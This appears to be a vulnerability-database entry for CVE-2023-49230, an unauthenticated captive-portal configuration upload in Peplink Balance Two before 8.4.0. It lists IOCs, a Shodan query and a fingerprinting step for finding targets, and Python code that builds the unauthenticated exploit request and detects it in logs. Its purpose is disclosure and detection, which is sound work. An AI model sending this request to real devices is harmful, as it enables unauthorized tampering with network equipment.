CVE-2023-49230
Published 2023-12-28
Priority: P2 · 59 · high · CVSS 3.1 base score 8.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EXPLOIT
EPSS 2.05% (78.8th percentile)
An issue was discovered in Peplink Balance Two before 8.4.0. A missing authorization check in captive portals allows attackers to modify the portals' configurations without prior authentication.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| peplink | balance_two_firmware | < 8.4.0 | 8.4.0 |
Detection & IOCs (extracted from sources)
- url: /guest/portal_admin_upload.cgi
- url: /guest/preview.cgi?portal_id=1
- path: /guest/api.cgi
- command: POST /guest/portal_admin_upload.cgi, multipart/form-data with fields option=edit_page, mode=submit, portal_id=1, data={JSON config}, logo_action=x
- command: mode=info&option=preview&portal_id=1 (POST body to /guest/api.cgi)
- Detect unauthenticated POST requests to /guest/portal_admin_upload.cgi carrying multipart/form-data with option=edit_page and mode=submit; no session or auth cookie is required for the write to succeed.
- Successful exploitation returns the JSON string "status": "save_success" in the response body from /guest/portal_admin_upload.cgi.
- Verify exploitation by POSTing mode=info&option=preview&portal_id=1 to /guest/api.cgi and confirming that the injected value appears in the HTTP 200 response body.
- Shodan query for exposed Peplink Balance Two devices: html:"PEPLINK"
- Fingerprint the target by checking for the string 'Peplink' in the body of GET /cgi-bin/MANGA/index.cgi before attempting exploitation.
- Only Peplink Balance Two firmware before 8.4.0 is affected; devices running 8.4.0 or later are not.
- The CVSS vector scores user interaction as required (UI:R): the rated impact assumes a victim action, even though the configuration write itself needs no authentication.
- The multipart boundary in the PoC template is fixed (370611892836891531633729116268); real-world requests may use a different boundary, so detection should not key on it.
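To make the request layout and the detection logic above concrete, here is an added Python example. It is not code from this page, from the Synacktiv advisory or from the Nuclei template: it builds the edit_page multipart request with the IOC fields, parses such a request on the detection side and flags the unauthenticated variant regardless of boundary, and checks the upload and preview responses for the indicators listed. The host 192.0.2.10 and the JSON config payload are placeholders, and requests are modelled as (method, path, headers, body) values with no network I/O.

```python
"""Added example for CVE-2023-49230: build the unauthenticated edit_page
request described in the IOCs above, and detect it on the log side.

Not code from this page, the Synacktiv advisory or the Nuclei template.
Assumptions: the host 192.0.2.10 and the JSON config are placeholders,
and requests are modelled as (method, path, headers, body) with no
real network I/O.
"""
import json
import re

UPLOAD_PATH = "/guest/portal_admin_upload.cgi"
VERIFY_PATH = "/guest/api.cgi"
# Boundary used by the PoC template; real requests may use any boundary,
# so nothing on the detection side depends on this exact value.
POC_BOUNDARY = "370611892836891531633729116268"
SUCCESS_MARKER = '"status": "save_success"'


def build_edit_page_request(host, portal_id=1, config=None, boundary=POC_BOUNDARY):
    """Return (headers, body) for the edit_page POST with the IOC fields.

    No Cookie header is set: that is the point of the vulnerability.
    """
    if config is None:
        config = {"title": "example"}  # constructed placeholder payload
    fields = [
        ("option", "edit_page"),
        ("mode", "submit"),
        ("portal_id", str(portal_id)),
        ("data", json.dumps(config)),
        ("logo_action", "x"),
    ]
    body = "".join(
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
        f"{value}\r\n"
        for name, value in fields
    ) + f"--{boundary}--\r\n"
    headers = {
        "Host": host,
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body.encode())),
    }
    return headers, body


def verify_request(portal_id=1):
    """(path, body) of the follow-up preview query that reflects the change."""
    return VERIFY_PATH, f"mode=info&option=preview&portal_id={portal_id}"


def parse_multipart_fields(content_type, body):
    """Minimal multipart/form-data parser: returns {field_name: value}.

    The boundary is read from the Content-Type header rather than
    hard-coded, so a PoC variant with a different boundary parses too.
    """
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return {}
    fields = {}
    for chunk in body.split("--" + m.group(1)):
        chunk = chunk.strip("\r\n")
        if not chunk or chunk == "--":  # preamble / closing delimiter
            continue
        head, _, value = chunk.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', head)
        if name:
            fields[name.group(1)] = value
    return fields


def is_unauth_portal_edit(method, path, headers, body):
    """True when a request matches the IOC: unauthenticated POST to the
    upload CGI with option=edit_page and mode=submit in the multipart body."""
    if method.upper() != "POST" or path.split("?", 1)[0] != UPLOAD_PATH:
        return False
    hdrs = {k.lower(): v for k, v in headers.items()}
    ctype = hdrs.get("content-type", "")
    if "multipart/form-data" not in ctype.lower():
        return False
    fields = parse_multipart_fields(ctype, body)
    if fields.get("option") != "edit_page" or fields.get("mode") != "submit":
        return False
    # A legitimate admin edit arrives with a session; the exploit does not.
    return "cookie" not in hdrs and "authorization" not in hdrs


def exploit_succeeded(response_body):
    """Success indicator from the IOCs: save_success in the upload response."""
    return SUCCESS_MARKER in response_body


def change_reflected(status, response_body, injected_value):
    """Verification step: the injected value shows up in the preview reply."""
    return status == 200 and injected_value in response_body


if __name__ == "__main__":
    hdrs, body = build_edit_page_request("192.0.2.10")
    print("flagged:", is_unauth_portal_edit("POST", UPLOAD_PATH, hdrs, body))
```

The detector deliberately keys on the path, the two form fields and the absence of a session cookie, not on the PoC's boundary string, so a rewritten PoC still matches; in a real pipeline the same three checks map directly onto a proxy or WAF log where the request body is available.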
No detection rules found.
Nuclei
CVE-2023-49230 [HIGH] Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload (nuclei · CVSS 8.8)
A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
Template:
```yaml
id: CVE-2023-49230

info:
  name: Peplink Balance Two before 8.4.0 - Unauthenticated Config Upload
  author: srilakivarma
  severity: high
  description: |
    A vulnerability in Peplink Balance Two prior to version 8.4.0 allows unauthenticated attackers to modify captive portal configurations due to a missing authorization check. Specifically, attackers can upload files via /guest/portal_admin_upload.cgi, with the changes reflected at /guest/preview.cgi?portal_id=1.
```
No writeups or analysis indexed.
References
- https://www.synacktiv.com/publications?field_tags_target_id=4
- https://www.synacktiv.com/sites/default/files/2023-12/synacktiv-peplink-multiple-vulnerabilities.pdf